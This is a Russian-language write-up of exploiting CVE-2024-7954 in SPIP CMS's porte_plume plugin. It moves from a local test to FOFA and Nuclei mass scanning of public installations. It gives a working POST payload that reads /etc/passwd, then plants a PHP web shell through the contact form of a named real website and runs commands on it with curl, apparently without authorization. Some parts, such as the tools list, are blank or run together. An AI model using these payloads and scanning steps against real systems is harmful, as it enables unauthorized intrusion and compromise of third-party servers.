
Эксплуатация уязвимости удаленного выполнения кода - (CVE-2024-7954)
Проект тестирования уязвимостей программного обеспечения Представлено: Shivansh Kuntal
Этот проект демонстрирует эксплуатацию CVE-2024-7954, критической уязвимости удаленного выполнения кода (RCE), затрагивающей SPIP CMS через плагин porte_plume. Уязвимость позволяет неавторизованным злоумышленникам выполнять произвольный PHP-код на целевом сервере с помощью специально сформированных HTTP POST-запросов. Тестирование проводилось в контролируемой локальной среде и позже было расширено до разведки в реальном мире с использованием FOFA и Nuclei.
Уязвимая версия SPIP CMS, подтвержденная как подверженная CVE-2024-7954, была развернута локально на сервере Apache с использованием репозитория GitHub, содержащего известные уязвимые релизы.
Используемые инструменты
Домашняя страница SPIP, работающая на localhost, подтвердила успешную установку и послужила целью для эксплуатации.
Плагин porte_plume (до версий 4.30-alpha2, 4.2.13, 4.1.16) уязвим из-за недостаточной очистки вводимых пользователем данных. Злоумышленники могут внедрять PHP-код в определенные поля формы, которые затем обрабатываются и выполняются сервером.
Воздействие: Неавторизованное удаленное выполнение кода Серьезность: Критическая Вектор атаки: Сеть / HTTP POST
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
Для перечисления публичных установок SPIP был использован запрос FOFA:
app="SPIP"
FOFA вернул несколько точек метаданных:
targets.txt для массового сканирования.Подходящий реальный хост, выявленный:
http://www.comite-tricolore.org/
Поскольку ручная эксплуатация медленна, для автоматизации обнаружения CVE-2024-7954 на большом наборе целей использовался Nuclei.
nuclei -l targets.txt -t CVE-2024-7954.yaml
-l targets.txt загружает результаты FOFA-t загружает пользовательский шаблон PoCПримечание: Исходный шаблон не вернул совпадений.
nuclei -l targets.txt -t cves/
Это сканирование выявило одну отвечающую цель:
http://www.comite-tricolore.org/
Посетите:
http://www.comite-tricolore.org/spip.php?page=contact
Подтверждено:
Используя Burp Suite или curl, измените параметр message:
Нагрузка
<?php system($_GET['cmd']); ?>
Посетите:
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
Или с помощью curl:
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
Вывод подтвердил удаленное выполнение команды.
Специально созданная нагрузка обеспечивает обратный вызов оболочки, позволяя:
whoamilsЭтот проект демонстрирует полную цепочку эксплуатации для CVE-2024-7954, от разведки до получения интерактивной оболочки.
Эта уязвимость подчеркивает, как, казалось бы, безобидный плагин форматирования текста может привести к полному компрометации системы при неправильной защите.